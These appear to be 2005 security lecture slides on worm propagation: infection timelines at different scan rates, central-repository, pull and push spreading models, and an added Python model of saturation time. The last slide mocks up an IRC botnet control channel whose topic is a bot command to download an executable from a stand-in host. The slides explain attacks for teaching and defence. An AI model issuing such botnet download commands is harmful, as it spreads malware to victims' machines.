Randy Marchany
marchany@vt.edu
VA Tech IT Security Lab
VASCAN 2005
575K hosts scanned
Worms scan entire IP address space
60% vulnerable systems online
Infects all systems within 20 weeks

35K hosts on VT net
Scan rate: 1/day
All hosts vulnerable
Total infection after 25 days

35K hosts on VT net
Scan rate: 1/hr
All hosts vulnerable
Total infection after 25 hours
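
As an added example (not from the original slides), a small expected-value model of the campus scenario above: 35K hosts, all vulnerable, one probe per infected host per scan interval. The uniform-random target selection, the single initial infection and the function names are assumptions; the step count is in units of the scan interval, which is why the same curve reads as days at 1 scan/day and as hours at 1 scan/hr.

```python
"""Added example: mean-field model of a random-scanning worm (not from the slides)."""


def steps_to_saturation(hosts, scans_per_step=1, initially_infected=1,
                        vulnerable_fraction=1.0):
    """Return (steps, history): steps until fewer than one vulnerable host
    is expected to remain uninfected, plus the infected count per step.

    Assumptions (labelled, not from the slides): every infected host probes
    `scans_per_step` addresses per time step, chosen uniformly at random
    from the `hosts` address space, and a probed vulnerable host is
    infected by the end of that step.
    """
    vulnerable = hosts * vulnerable_fraction
    infected = float(initially_infected)
    miss = 1.0 - 1.0 / hosts          # chance one probe misses a given host
    history = [infected]
    steps = 0
    while vulnerable - infected >= 1.0:
        probes = infected * scans_per_step
        susceptible = vulnerable - infected
        # Each susceptible host escapes only if every probe misses it.
        infected += susceptible * (1.0 - miss ** probes)
        history.append(infected)
        steps += 1
    return steps, history


def first_step_reaching(history, hosts, fraction):
    """First step at which the infected share of `hosts` reaches `fraction`."""
    for step, infected in enumerate(history):
        if infected >= fraction * hosts:
            return step
    return None


if __name__ == "__main__":
    N = 35_000  # campus population from the slide
    steps, history = steps_to_saturation(N)
    half = first_step_reaching(history, N, 0.5)
    print(f"50% infected at step {half}, saturation at step {steps}")
    # A step is one scan interval: days at 1 scan/day, hours at 1 scan/hr.
    # The time available to detect and contain shrinks by the same factor.
    fast, _ = steps_to_saturation(N, scans_per_step=24)
    print(f"24 scans per step: saturation at step {fast}")
```

Most of the run is spent in the slow early doubling phase, so the window for detection and containment is the first half of the curve, before the infected share becomes visible in aggregate traffic.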
Black – C&C
Red – Scan info
VASCAN 2005 Copyright Marchany 2005
Malware Propagation
Central repository
  Malware sits on FTP/WWW server
  Victim downloads code from there
  Trinoo, shaft, W32/Leaves, W32/SoBig
Back-Chaining (pull)
  Malware transferred from victim to next
  Exploit, copy code, repeat with next host
Push or Forward
  Exploit contains the malware, so no copy
Welcome to irc.whitehouse.gov
Your host is h4x0r.ownz.j00
There are 9556 users and 9542 invisible on 1 server
5 : channels formed
1: operators online
Channel Users Topic
#help 1
#oldbots 5 .download http://w4r3z.example.org/r00t.exe
End of /LIST